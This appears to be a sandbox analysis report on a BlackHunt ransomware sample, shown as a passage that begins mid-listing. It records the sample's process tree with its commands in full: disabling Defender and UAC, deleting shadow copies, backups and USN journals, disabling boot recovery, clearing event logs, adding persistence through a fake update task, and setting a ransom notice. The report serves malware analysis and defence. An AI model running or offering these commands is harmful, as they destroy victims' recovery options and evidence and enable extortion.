23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 128 PID 4016 wrote to memory of 2572 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 128 PID 4580 wrote to memory of 1420 4580 cmd.exe 131 PID 4580 wrote to memory of 1420 4580 cmd.exe 131 PID 2340 wrote to memory of 4808 2340 cmd.exe 132 PID 2340 wrote to memory of 4808 2340 cmd.exe 132 PID 2896 wrote to memory of 4528 2896 cmd.exe 193 PID 2896 wrote to memory of 4528 2896 cmd.exe 193 PID 4016 wrote to memory of 2200 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 134 PID 4016 wrote to memory of 2200 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 134 PID 4140 wrote to memory of 3440 4140 cmd.exe 194 PID 4140 wrote to memory of 3440 4140 cmd.exe 194 PID 4016 wrote to memory of 2488 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 137 PID 4016 wrote to memory of 2488 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 137 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe"C:\Users\Admin\AppData\Local\Temp\23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4016 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2212
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:3688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:4328
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2572
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1692
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2200
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2488
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1992
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3160
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3928
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:3104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:3688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1132
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:512
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:3848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1704
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:4328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3412
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe" /F2⤵PID:3164
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe" /F3⤵
- Creates scheduled task(s)
PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3636
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4508
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4952
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:464
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4176
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4528
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:856
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1588
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:4576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3548
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1540
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:19052
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:18852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:19136
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:20336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:19404
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:5140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:18548
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:16960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:14324
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:16948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:15924
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:17256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:18916
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:17320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:16908
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:17412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:17196
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:17680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:17208
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:17444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:17364
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:17848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:17524
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:18176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:17548
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:18088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:17764
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:18388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:17800
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:19068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:17916
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:19064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:18076
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:15616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:20312
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:19264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:18316
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:19384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:18444 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:19452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 19452 -s 14604⤵
- Program crash
PID:19620
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe"2⤵PID:18572
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:19164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:18440
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:19328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:13756
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:19296
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:18584
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:8240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 19452 -ip 194521⤵PID:19580
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD538a267022b800eea4c030d99f491dfd9
SHA1153d43a897e4da4796a75205a75944ea61c77b13
SHA256247e82c21cadf44896730648ada0908eb3d51dfba581a180a10f6624ffe510f7
SHA512c66f657f97d72462c78d328e9b2a9a6c59824d96b74e6b8997c5f4c2a9b4dec8e4d8df70d6848faa2b0f5688d9c12d0e036620c9fa0312e5e098c072a7ae2888
-
Filesize
12KB
MD5a24ab0e93c40fd466e633b1e8ee1396f
